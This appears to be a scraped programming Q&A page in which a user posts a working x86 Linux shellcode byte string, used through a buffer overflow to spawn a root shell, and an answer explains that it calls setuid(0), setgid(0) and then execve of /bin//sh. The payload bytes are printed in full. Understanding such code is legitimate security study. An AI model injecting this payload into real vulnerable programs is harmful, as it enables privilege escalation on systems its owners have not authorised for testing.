TechQA.

Interpreting a shellcode

771 views Asked by At

I am calling a shellcode using buffer overflow to spawn a root shell. Can somebody explain what this shellcode exactly does? I have tried different shellcodes to spawn a root shell, but this was the only one which worked for me.

\x31\xdb\x89\xd8\xb0\x17\xcd\x80\x31\xdb
\x89\xd8\xb0\x2e\xcd\x80\x31\xc0\x50\x68
\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89
\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd
\x80
c shellcode
Original Q&A
1

There are 1 answers

0
Medinoc On

On first glance, the code appears to do setuid(0), then setgid(0), then call sys_execve() on some values (which include ASCII codes for "/bin//sh").

Looks like this is pure "payload" code, since I don't see anything to ensure the code is executed on the first place (buffer overflow, stack smashing, etc.).

(Thanks to @Hans Lub for the disassembler link)

Related Questions in C

Related Questions in SHELLCODE

Popular Questions

Popular Tags

javascript python java c# php android html jquery c++ css ios sql mysql r reactjs node.js arrays c asp.net json python-3.x ruby-on-rails .net sql-server swift django angular objective-c pandas excel

Trending Questions